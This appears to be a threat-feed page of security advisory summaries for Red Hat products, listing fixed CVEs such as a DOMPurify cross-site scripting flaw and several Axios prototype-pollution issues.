Threats Tagged 'cve-2026-41240'

Red Hat Discovery, also known as Discovery, is an inspection and reporting tool that finds, identifies, and reports environment data, or facts, such as the number of physical and virtual systems on a network, their operating systems, and relevant configuration data stored within them. Discovery also identifies and reports more detailed facts for some versions of key Red Hat packages and products that it finds in the network.

Kiali 1.73.30, for Red Hat OpenShift Service Mesh 2.6, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently. Security Fix(es): * CVE-2026-32280 Go: Denial of Service vulnerability in certificate chain building (OSSM-13521) * CVE-2026-40895 follow-redirects: Information disclosure via cross-domain redirects (OSSM-13550, OSSM-13551) * CVE-2026-41240 DOMPurify: Cross-Site Scripting (XSS) via inconsistent tag sanitization (OSSM-13592) * CVE-2026-42033 Axios: HTTP Transport Hijacking via Prototype Pollution (OSSM-13687, OSSM-13688) * CVE-2026-42035 Axios: Arbitrary HTTP header injection via prototype pollution (OSSM-13594, OSSM-13595) * CVE-2026-42039 Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data (OSSM-13725, OSSM-13726) * CVE-2026-42041 Axios: Authentication bypass due to prototype pollution of HTTP error handling (OSSM-13739, OSSM-13740) * CVE-2026-42043 Axios: NO_PROXY bypass via crafted URL (OSSM-13711, OSSM-13712) Enhancement(s): * OSSM-12301 Migration from Yarn Classic (v1) to Yarn v4 or NPM For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities. Security Fix(es): * tornado-python: Tornado: Denial of Service via large multipart bodies (CVE-2026-31958) * lodash: lodash: Arbitrary code execution via untrusted input in template imports (CVE-2026-4800) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Red Hat OpenShift Data Foundation 4.16.26 security, enhancement & bug fix update FIXED BUGS: ========== DFBUGS-6193: Backport to odf-4.16.26 ocs-operator should not use image gcr.io/kubebuilder/kube-rbac-proxy DFBUGS-5940: Backport to odf-4.16.z [External Mode]: noobaa-default-backing-store is in creating state due to "CheckExternalConnection Status=UNKNOWN_FAILURE Error=SELF_SIGNED_CERT_IN_CHAIN"

Red Hat Lightspeed in Satellite analyzes system health and configuration by applying predefined rules to a small set of local data, such as installed packages, running services, and configuration settings. When you install Red Hat Lightspeed in Satellite locally, you can generate Red Hat Lightspeed recommendations without sending system data to Red Hat services.

This release of Red Hat build of Quarkus 3.27.3.SP1 includes the following CVE fixes: * quarkus-vertx-http: io.quarkus:quarkus-vertx-http: Authorization bypass via semicolons in HTTP requests [quarkus-3.27] (CVE-2026-39852) * bcprov-jdk18on: LDAP injection vulnerability in LDAPStoreHelper.java [quarkus-3.27] (CVE-2026-0636) * bcpkix-jdk18on: PKIX draft CompositeVerifier accepts empty signature sequence as valid [quarkus-3.27] (CVE-2026-5588) * bcprov-jdk18on: GOSTCTR implementation unable to process more than 255 blocks correctly [quarkus-3.27] (CVE-2025-14813) * kafka-clients: Apache Kafka Clients: Information disclosure and data corruption due to race condition in producer buffer management [quarkus-3.27] (CVE-2026-35554) For more information, see the release notes page listed in the References section.

DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions prior to 3.4.0 have an inconsistency between FORBID_TAGS and FORBID_ATTR handling when function-based ADD_TAGS is used. Commit c361baa added an early exit for FORBID_ATTR at line 1214. The same fix was not applied to FORBID_TAGS. At line 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely. This allows forbidden elements to survive sanitization with their attributes intact. Version 3.4.0 patches the issue.